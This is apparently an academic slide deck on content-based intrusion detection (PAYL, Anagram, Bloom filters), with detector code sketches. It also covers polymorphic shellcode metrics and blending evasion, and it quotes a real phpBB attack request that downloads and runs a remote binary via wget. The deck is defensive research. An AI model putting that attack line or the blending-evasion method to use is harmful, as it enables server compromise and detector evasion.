1
Content-based Anomaly Detection
  • Salvatore J. Stolfo
  • Columbia University
  • Department of Computer Science
  • IDS Lab

December 2007
2
Collaborators
  • Gabriela Cretu
  • Angelos Keromytis
  • Mike Locasto
  • Janak Parekh
  • Angelos Stavrou
  • Yingbo Song
  • Ke Wang

3
Agenda
  • Anagram payload anomaly detection algorithm (post-PAYL)
  • The Polymorphic Threat
  • Countering Adversarial training/mimicry attacks
  • Randomized modeling/testing

4
Conjecture and Goal
  • Detect zero-day exploits via content analysis
  • Worm propagation is detectable via flow statistics (except perhaps slow worms)
  • Targeted attacks are sophisticated and stealthy, with no loud and obvious propagation/behavior
  • A true zero-day will manifest as never-before-seen data
  • Learn typical/normal data, detect abnormal data
  • Desiderata: accuracy, efficiency, scale, counter-evasion (resist training and mimicry attacks)
  • Minimize false negatives
  • Minimize resource consumption too (think MANETs)

5
Goal
  • We seek to model normal payload
  • Ingress from external sources to servers
  • Egress from servers to external sources
  • Egress from clients within a LAN
  • We model content flows that are cleartext
  • Learn typical/normal data to detect abnormal data; the model need not be perfect
  • Whitelisted data deemed normal passes
  • Blacklisted data is filtered
  • Suspicious data deemed abnormal is subjected to deeper analysis, e.g., emulation
  • Overall goal for the system:
  • Don't negatively impact operations
  • Maintain throughput, minimize latency, minimize cost

6
(No Transcript)
7
Previous work: PAYL
  • Models the length-conditioned character frequency distribution (1-grams) of normal traffic (see the sketch below)
  • Testing: Mahalanobis distance of the test packet against the model
  • Pro:
  • Simple, fast, memory efficient
  • Con:
  • Cannot capture attacks displaying a normal byte distribution
  • Easily fooled by mimicry attacks with proper padding
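
A minimal sketch of the PAYL idea (illustrative, not the authors' code; the real system conditions one model on each port and payload-length bin, which is omitted here). The test statistic is PAYL's simplified Mahalanobis distance, sum |x_i - mean_i| / (std_i + alpha):

import numpy as np

class Payl1GramModel:
    def __init__(self, alpha: float = 0.001):
        self.alpha = alpha              # smoothing factor avoids division by zero
        self.freqs = []                 # per-packet byte-frequency vectors

    @staticmethod
    def byte_freq(payload: bytes) -> np.ndarray:
        counts = np.bincount(np.frombuffer(payload, dtype=np.uint8), minlength=256)
        return counts / max(len(payload), 1)

    def train(self, payload: bytes) -> None:
        self.freqs.append(self.byte_freq(payload))

    def finalize(self) -> None:
        f = np.array(self.freqs)
        self.mean, self.std = f.mean(axis=0), f.std(axis=0)

    def score(self, payload: bytes) -> float:
        # simplified Mahalanobis distance: sum |x_i - mean_i| / (std_i + alpha)
        x = self.byte_freq(payload)
        return float(np.sum(np.abs(x - self.mean) / (self.std + self.alpha)))

model = Payl1GramModel()
for pkt in (b"GET / HTTP/1.0\r\n\r\n", b"GET /index.html HTTP/1.0\r\n\r\n"):
    model.train(pkt)
model.finalize()
print(model.score(b"GET / HTTP/1.0\r\n\r\n"))   # low score for normal-looking input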

8
Example: phpBB forum attack
GET /modules/Forums/admin/admin_styles.php?phpbb_r
oot_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/t
mp;wget%20216.15.209.4/criman;chmod%20744%20criman;
./criman;echo%20YYY;echo..HTTP/1.1.Host.128.59.
16.26.User-Agent.Mozilla/4.0.(compatible.MSIE.6.
0.Windows.NT.5.1)..
  • Relatively normal byte distribution, so PAYL misses it
  • What we need: capture the order dependence of byte sequences
  • PAYL-style frequency-based modeling of n-grams (n>1) is infeasible here, since the feature space is huge and requires long training time
  • Anagram: higher-order n-gram (n>1) modeling is possible

9
Why n-grams?
  • Easily extracted feature from packet payload
    flows
  • Language/protocol independent

10
Overview of Anagram
  • Binary-based higher-order n-gram modeling
  • Store all the distinct n-grams appearing in the normal training data
  • During testing, compute the percentage of never-seen distinct n-grams out of the total n-grams in a packet (see the sketch below)
  • Semi-supervised:
  • Normal traffic is modeled
  • Previously known malicious traffic is also modeled: Snort rules, captured malcode
  • The model is space-efficient, using Bloom filters with gzip
  • Normal 7-gram BF: 16 MB -> 1.2 MB after gzip
  • Malicious mixed 2-9-gram BF: 8 MB -> 0.8 MB after gzip
  • Accurate anomalous payload detection, even against carefully crafted mimicry attacks
  • Fast correlation of multiple alerts while preserving privacy, using a Bloom filter representation of anomalous payload
  • Generates robust attack signatures
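
A minimal sketch of the binary n-gram scoring described above (illustrative, not the authors' code). A plain Python set stands in for the Bloom filter, which is sketched on the next slide; the n-gram size N = 5 is just an example:

N = 5   # example n-gram size; the deployed system used higher orders too

def ngrams(payload: bytes, n: int = N):
    return [payload[i:i+n] for i in range(len(payload) - n + 1)]

def train(model: set, payload: bytes) -> None:
    model.update(ngrams(payload))               # store every distinct n-gram seen

def score(model: set, payload: bytes) -> float:
    grams = ngrams(payload)
    if not grams:
        return 0.0
    unseen = sum(1 for g in grams if g not in model)
    return unseen / len(grams)                  # fraction of never-seen n-grams

model = set()
train(model, b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n")
print(score(model, b"GET /cmd.exe?/c+dir HTTP/1.1\r\nHost: example.com\r\n\r\n"))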

11
Bloom filter
  • A Bloom filter (BF) is a one-way data structure that supports insert and verify operations, yet is fast and space-efficient
  • Represented as a bit vector: bit b is set if h_i(e) = b, where h_i is a hash function and e is the element in question
  • No false negatives, although false positives are possible in a saturated BF via hash collisions; use multiple hash functions for robustness
  • Each n-gram is a candidate element to be inserted or verified in the BF (see the sketch below)
  • Bloom filters are also privacy-preserving, since n-grams cannot be extracted from the resulting bit vector
  • An exhaustive dictionary attack may reveal grams
  • Frequencies of grams are not available, so reconstruction is very hard
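
A minimal Bloom filter sketch supporting insert and verify. The hash construction (k salted SHA-1 digests reduced mod m) is an illustrative assumption, not necessarily the hashing used in Anagram:

import hashlib

class BloomFilter:
    def __init__(self, m_bits: int = 2**20, k: int = 3):
        self.m = m_bits                     # number of bits in the filter
        self.k = k                          # number of hash functions
        self.bits = bytearray(m_bits // 8)

    def _positions(self, element: bytes):
        # derive k positions from salted SHA-1 digests (illustrative choice)
        for i in range(self.k):
            h = hashlib.sha1(bytes([i]) + element).digest()
            yield int.from_bytes(h[:8], "big") % self.m

    def insert(self, element: bytes) -> None:
        for p in self._positions(element):
            self.bits[p // 8] |= 1 << (p % 8)

    def contains(self, element: bytes) -> bool:
        # no false negatives; false positives possible if the filter saturates
        return all(self.bits[p // 8] & (1 << (p % 8))
                   for p in self._positions(element))

bf = BloomFilter()
bf.insert(b"GET /")
print(bf.contains(b"GET /"), bf.contains(b"cmd.e"))   # True False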

12
(No Transcript)
13
Overview of Anagram (Training: BF models)
14
Overview of Anagram (Detection: BF represents anomalous packet data)
15
False positive rate (at 100% detection rate) with different training times and different n-gram sizes n.
Normal traffic: real web traffic collected off two CUCS web servers. Test worms: CR, CRII, WebDAV, Mirela, phpBB forum attack, nsiislog.dll buffer overflow (MS03-022)
  • Low false positive rate PER PACKET (better per flow)
  • No significant gain after 4 days of training
  • Higher-order n-grams need longer training time to build a good model
  • 3-grams are not long enough to distinguish malicious byte sequences from normal ones

16
Anagram: semi-supervised learning
  • The binary-based approach is simple and efficient, but too sensitive to noisy data
  • Avoid high-entropy fields
  • Pre-compute a "bad content" model from Snort rules and a collection of worm samples
  • This model should match few normal packets while identifying malicious traffic (often, new exploits reuse portions of old exploits)
  • The model contains the distinct n-grams appearing in malcode collections that do not also appear in normal traffic
  • Use a small, clean dataset to exclude the normal n-grams appearing in the Snort rules and virus samples

17
Use of the bad content model
  • Training: ignore possibly malicious n-grams
  • Packets with too many n-grams matching the bad content model are ignored
  • Packets with a high matching score (>5%) are ignored, since new attacks might reuse old exploit code
  • Ignoring a few packets is harmless for training
  • Testing: scoring separates malicious from normal
  • If a never-seen n-gram also appears in the bad content model, give it a higher weight factor t (t = 5 in our experiments; see the sketch below)
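
A sketch of the weighted scoring rule just described, with plain sets as stand-ins for the two Bloom filters (normal_model, bad_model); the exact normalization used in the deployed system may differ:

def weighted_score(normal_model: set, bad_model: set, payload: bytes,
                   n: int = 5, t: int = 5) -> float:
    # a never-seen n-gram that also hits the bad-content model counts t times
    grams = [payload[i:i+n] for i in range(len(payload) - n + 1)]
    if not grams:
        return 0.0
    total = sum((t if g in bad_model else 1)
                for g in grams if g not in normal_model)   # never-seen grams only
    return total / len(grams)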

18
The false positive rate (at 100% detection rate) for different n-gram sizes, under both normal and semi-supervised training (per-packet rate)
19
Yesterday's News, literally!
20
Can we get ahead of the enemy?
  • Polymorphism complicates everything and challenges assumptions
  • So, how well do current engines do?
  • Metrics to evaluate
  • Spectral imaging to visualize
  • Can we pre-compute malcode before the enemy does, and pre-model variants yet to be seen in the wild?
  • GA search to generate decoders

21
Analysis of the Polymorphic Threat
  • Goals:
  • Analyze the effectiveness of current polymorphism techniques employed by shellcoders to evade signature-based IDS
  • Develop metrics to quantify the strength of modern polymorphic engines, and use them to analyze existing engines in the wild
  • Explore the threat of combining polymorphism with other evasion techniques, such as blending attacks
  • Explore future theoretical limits of shellcode polymorphism

22
Why use Polymorphism?
  • An easy-to-use obfuscation technique to complicate detection
  • Basic shellcode form: [NOP][PAYLOAD][RETADDR]
  • Basic cipher-based polymorphism:
  • 1. Cipher/encode the payload
  • 2. Prepend a decoder in front
  • 3. The shellcode decrypts itself as it executes!
  • Now only the decoder needs to be polymorphic
  • Polymorphic shellcode: [NOP][DECODER][CIPHER_TEXT][RETADDR]

23
Polymorphic Shellcode
  • A sample decoder from the open-source CLET engine
  • Only 35 bytes are needed to generate five layers of cipher operations

How can we measure the effectiveness of these polymorphic techniques? Modeling the encrypted portion is impossible; we need a metric to measure decoder variants.
24
Strength Metrics for Polymorphism
  • Variation strength estimates the spread over n-space
  • (the average of the square roots of the covariance-matrix eigenvalues that span the generated space of decoders)
  • Propagation strength estimates how different each decoder appears
  • (measures the expected distance between any two decoders)
  • Overall strength is the product of the two metrics. Some engines generate many decoders by shifting the order of operations; in that case, variation strength might be high, but the propagation strength would be low. (A sketch of both metrics follows.)
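
A sketch of the two metrics as defined above, in NumPy. The Euclidean distance and the Monte Carlo estimate of the expected pairwise distance are illustrative assumptions; the published definitions may normalize differently:

import numpy as np

def variation_strength(decoders) -> float:
    # decoders: (num_samples, n) array, one byte-valued decoder per row
    d = np.asarray(decoders, dtype=float)
    eig = np.linalg.eigvalsh(np.cov(d, rowvar=False))   # covariance eigenvalues
    return float(np.mean(np.sqrt(np.clip(eig, 0.0, None))))

def propagation_strength(decoders, pairs: int = 1000) -> float:
    # Monte Carlo estimate of the expected distance between two random decoders
    d = np.asarray(decoders, dtype=float)
    rng = np.random.default_rng(0)
    i, j = rng.integers(0, len(d), size=(2, pairs))
    return float(np.linalg.norm(d[i] - d[j], axis=1).mean())

def overall_strength(decoders) -> float:
    return variation_strength(decoders) * propagation_strength(decoders)

# e.g., random strings over the full byte range as a baseline:
rng = np.random.default_rng(1)
print(overall_strength(rng.integers(0, 256, size=(50_000, 30))))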

25
Strength Metrics
  • To evaluate the strength of a polymorphic engine, we take a shellcode sample, use the engine to generate 50,000 decoders, extract the decoders, and then apply the metrics presented above

Decoder polymorphism strengths for various engines using our metric. For comparison, we also present the scores for random strings over byte ranges 128 and 256
26
Strength Metrics
  • Another innovation: spectral images
  • Generate decoder samples, stack them together, and display the stacked samples as an image. The invariants appear as stripes.

27
Exemplar Polymorphic Blending Engine
Combine CLET and ADMmutate, and add our own blending engine. CLET ciphers the shellcode and leaves a blending section open; execution doesn't reach it.
  • ADMmutate hides CLET's NOP sled
  • The decoder and exploit section is randomized
  • The return-address section is obfuscated, with blending aimed at some target distribution

Each row of pixels represents a fully working shellcode: [nop][decoder][cipher-text][open-blend][retaddr]
28
Polymorphic Blending Potential
  • The blending section sits outside the shellcode's inner loop and is never reached during execution. Attackers can fill this area with bytes sampled from the same distribution as the target network to bypass statistical IDS sensors (see the sketch below).
  • The byte distribution of a sample target network.
  • Mahalanobis distance of the shellcode byte distribution to the target distribution as we enlarge the blending section.
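
A sketch of the blending effect, with a randomly drawn stand-in for the target network's byte distribution and an L1 distance between distributions standing in for the Mahalanobis distance; as the blending section grows, the packet's distribution pulls toward the target:

import numpy as np

rng = np.random.default_rng(0)
target = rng.dirichlet(np.ones(256))                     # stand-in target byte distribution
shellcode = rng.integers(0, 256, 200, dtype=np.uint8).tobytes()  # stand-in shellcode

def dist(payload: bytes) -> float:
    counts = np.bincount(np.frombuffer(payload, dtype=np.uint8), minlength=256)
    return float(np.abs(counts / len(payload) - target).sum())

for pad_len in (0, 200, 1000, 5000):
    # fill the open blending section with bytes sampled from the target distribution
    pad = rng.choice(256, size=pad_len, p=target).astype(np.uint8).tobytes()
    print(pad_len, round(dist(shellcode + pad), 4))      # distance shrinks with padding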

29
Is N-space Saturated?
  • Theoretical limits of polymorphism?
  • GA search shows n-space is likely saturated with x86 code that behaves like polymorphic decoders
  • Magnitude of decoders: 256^N, where N is the length of the decoder (~30 bytes). The number of atoms in the universe is only ~10^80.

30
Conclusion on Polymorphism
  • The metrics provide a means to quantify the strength of polymorphic engines relative to each other
  • Very sophisticated polymorphism techniques are already implemented and are a real threat
  • Experimental results show that there is virtually no limit to the ways decoders can be written
  • Signature-based methods aren't likely to work in the long term
  • The only hope?
  • Either instrument ALL systems with dynamic host-based tests
  • Or counter these evasion techniques with better content AD sensors
  • We do not yet know whether another modeling technique can effectively discriminate well enough between malicious and benign content

31
Counter Evasion
  • Blind the attacker to critical information using randomization techniques
  • We assume attackers know the algorithm and can perhaps estimate the target distribution over some period of time, but they may not know the actual model used by a content AD sensor!
  • The enemy needs to know:
  • Where to pad
  • Hide the packet locations where models are tested
  • What to pad
  • Hide the normal distribution
  • Length-conditioned models
  • E.g., multiple Bloom filters per model
  • Hide the gram size
  • Random choice of n
  • When to pad
  • Re-compute models on a random schedule
  • E.g., time-bounded Bloom filter models

32
Randomization against mimicry attacks
  • The general idea of payload-based mimicry attacks is to craft a small piece of exploit code with a large amount of normal padding, so the whole packet looks normal w.r.t. some particular model
  • If we randomly choose the payload portions for modeling/testing, the attacker cannot know precisely which byte positions to pad to appear normal; it becomes harder to hide the exploit code!
  • This is a general technique that can be used for both PAYL and Anagram, or any other payload anomaly detector
  • For Anagram, additional randomization: keep the n-gram size a secret!

33
Randomized Modeling (1)
  • Separate the whole packet/session randomly into several (possibly interleaved) substrings or subsequences S1, S2, ..., SN, and build one model for each of these randomly chosen portions
  • The test payload is divided accordingly

34
Randomization techniques (2)
  • Randomized testing: a simpler strategy that does not incur substantial overhead
  • Build one model for the whole packet, but randomize the tested portions
  • Separate the whole packet randomly into several (possibly interleaved) partitions S1, S2, ..., SN
  • Score each randomly chosen partition separately (see the sketch below)
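
A sketch of the random partitioning step: a secret seed held by the sensor assigns byte positions to (possibly interleaved) partitions. Scoring each partition with the payload model is left abstract:

import random

def partition_payload(payload: bytes, num_parts: int, seed: int):
    # seed is the sensor's secret; byte positions are assigned at random,
    # yielding (possibly interleaved) subsequences S1, ..., SN
    rng = random.Random(seed)
    parts = [bytearray() for _ in range(num_parts)]
    for byte in payload:
        parts[rng.randrange(num_parts)].append(byte)
    return [bytes(p) for p in parts]

# Each partition is then scored separately against the payload model; an
# attacker who does not know the seed cannot tell which positions to pad.
for s in partition_payload(b"GET /index.html HTTP/1.1", num_parts=3, seed=42):
    print(s)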

35
(No Transcript)
36
Randomization techniques (3)
  • Fine-grained modeling of normal payload
  • Condition models on packet length or randomly chosen packet portions
  • Could incur large memory costs
  • Cluster adjacent models to reduce the detector's space

37
Example of clustering models
  • Original models
  • Clustered models

38
Feedback-based learning with shadow servers
(correlation with server responses)
  • Training attacks: the attacker sends malicious data during training time to poison the model
  • The bad content model cannot guarantee 100% detection
  • The most reliable defense is to use the feedback of a host-based shadow server to supervise the training
  • Also useful for adaptive learning to accommodate concept shift
  • Anagram can be used as a first-line classifier to amortize the expensive cost of the shadow server
  • Only a small percentage of the traffic is sent to the shadow server, instead of all of it
  • The shadow server's feedback can improve the accuracy of Anagram

39
(No Transcript)
40
Minimize Latency
  • False positive rate is not the only metric: sensor speed is crucial, since all traffic passes through the sensor, and accuracy impacts latency
  • A protected system with a shadow server incurs latency
  • True positives are filtered
  • No latency for true negatives; some latency for false positives
  • L = operational latency per request; O = shadow server cost factor (e.g., 20% overhead -> O = 1.2); F = false positive rate of the sensor
  • L' = ((1 - F) x L) + (L x O x F); target: L' ~ L
  • With O = 1.2, F can be as high as 10% (L' = 1.02 L, about 2% added latency)
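
A minimal check of the latency formula above. The reading of O as a shadow-server cost factor (20% overhead -> O = 1.2) is an assumption, since the original slide text is garbled:

def effective_latency(L: float, O: float, F: float) -> float:
    # true negatives pass at cost L; false positives take the shadow path at O*L
    return (1 - F) * L + L * O * F

print(effective_latency(L=1.0, O=1.2, F=0.10))   # 1.02 -> only 2% added latency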
41
Thank you!
42
With the huge feature space of higher-order n-grams, when is the model well trained? How likely are we to see new normal n-grams?
The likelihood of seeing new n-grams, i.e., the percentage of new distinct n-grams out of every 10,000 packets, as we train on up to 500 hours of traffic data
43
Distribution of bad content matching scores for
normal packets (left) and attack packets
(right). The matching score is the percentage
of the n-grams of a packet that match the bad
content model
44
Cross-site collaboration: content alert sharing
  • Principles:
  • Each site has a distinct content flow
  • Diversity via content (not system or software)
  • A higher standard to confound mimicry attacks
  • Exploit writers/attackers have to learn the distinct content traffic patterns of many different sites
  • If multiple sites see the same/similar content alerts, it's highly likely to be a true worm/targeted outbreak
  • Each site corroborates its evidence
  • Reduces false positives by creating whitelists of those alerts that cannot be correlated

45
Anagram: privacy-preserving cross-site collaboration
  • The anomalous n-grams of suspicious payloads are stored in a Bloom filter and exchanged among sites
  • By checking the n-grams of local alerts against the Bloom filter alert, it's easy to tell how similar the alerts are to each other (see the sketch below)
  • The common malicious n-grams can be used for general signature generation, even for polymorphic worms
  • Privacy-preserving with no loss of accuracy
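
A sketch of the correlation step, with a set of hashed n-grams standing in for the exchanged Bloom filter; similarity is the fraction of a local alert's n-grams found in the remote site's filter:

import hashlib

def gram_hashes(payload: bytes, n: int = 5) -> set:
    # one-way hashes of n-grams, so raw content is never shared
    return {hashlib.sha1(payload[i:i+n]).digest()
            for i in range(len(payload) - n + 1)}

def alert_similarity(local_alert: bytes, remote_filter: set) -> float:
    grams = gram_hashes(local_alert)
    if not grams:
        return 0.0
    return sum(1 for g in grams if g in remote_filter) / len(grams)

# A high similarity score across sites suggests a common worm or targeted
# attack rather than a site-local false positive.
remote = gram_hashes(b"GET /cmd.exe?/c+dir HTTP/1.1")
print(alert_similarity(b"GET /cmd.exe?/c+dir HTTP/1.0", remote))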

46
Counter Evasion: Collaborative Sharing of Suspicious Content (DNAD-2/AEOLOS)
PI: Sal Stolfo, Columbia University, Tel. (212) 939-7080, E-Mail: sal@cs.columbia.edu
  • Objective:
  • Validate suspect anomalous content detected locally as a true new attack exploit
  • Identify anomalous content indicative of attack, botnet command and control, or malware embedded in docs
  • Resist mimicry and training attacks
  • Cross-site validation to detect true positives
  • Preserve privacy of shared data among sites
  • Contract: Army Research Office, No. DA W911NF-04-1-0442
  • Budget: FY05-07 NSA MIPR/ARO 420K

Continuous, semi-supervised learning of new attack exploits; cross-site validation
  • Accomplishments:
  • Developed the new Anagram sensor, shown to resist mimicry attack
  • Developed new quantifiable privacy-preservation techniques for cross-domain sharing
  • Collaborating with NSA and other organizations to test
  • Challenges:
  • Cross-site collaborators and managing privacy policies
  • Develop interchange formats and interfaces for content submission
  • Scientific/Technical Approach:
  • Anagram anomaly detector based upon randomized models, countering mimicry attacks
  • Use the privacy-preserving one-way Bloom filter data structure to share anomalous content among sites and correlate to filter out false positives
  • Robust signatures extracted from Bloom filters

47
DNAD
  • Goal: develop a new paradigm for intrusion-alert information sharing while maintaining compliance with information disclosure restrictions and privacy policies
  • Support rich, varied types of intrusion alerts and models/profiles of behavior
  • Critical to get an accurate global view of threats rapidly to enable defense mechanisms
  • IRB/legal roadblocks prevented wide-scale deployment

48
DNAD corroboration model
  • Transmit privacy-preserving transforms of IDS alerts, extending beyond headers to network traffic payloads and other models
  • Build a robust, temporally enabled corroboration infrastructure able to match alerts (and fragments of alerts) across sites
  • Use compact Bloom filters and n-gram analysis for fast, robust encoding
  • Automatic suspect-signature generation

49
A graphical view: think P2P
50
What if we exchange models too?
Models
51
Training data sanitization
  • Motivation:
  • Focus on zero-day attacks, but:
  • Anomaly detection performance can be improved by using clean training data
  • Attacks appearing in the training data can degrade detection performance
  • False positives create excessive noise
  • Method:
  • Use a large set of (distributed and diverse) training data of network packet payloads from multiple domains
  • Divide the data into multiple blocks
  • Build a model for each block and exchange models (privacy preservation)
  • Test all models against a smaller local dataset
  • Use voting algorithms (a la bagging predictors) to separate false positives from true positives (see the sketch below)
  • Clean the data based on the previous step
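
A sketch of the voting step, where build_model and score are hypothetical placeholders for the per-block model construction and an Anagram-style scoring function; a packet is kept only if few micro-models consider it abnormal:

def sanitize(blocks, test_set, build_model, score,
             threshold: float = 0.5, vote_ratio: float = 0.5):
    # one micro-model per training block (a la bagging predictors)
    models = [build_model(block) for block in blocks]
    clean = []
    for packet in test_set:
        votes = sum(1 for m in models if score(m, packet) > threshold)
        if votes / len(models) < vote_ratio:    # few models object
            clean.append(packet)                # keep as sanitized training data
    return clean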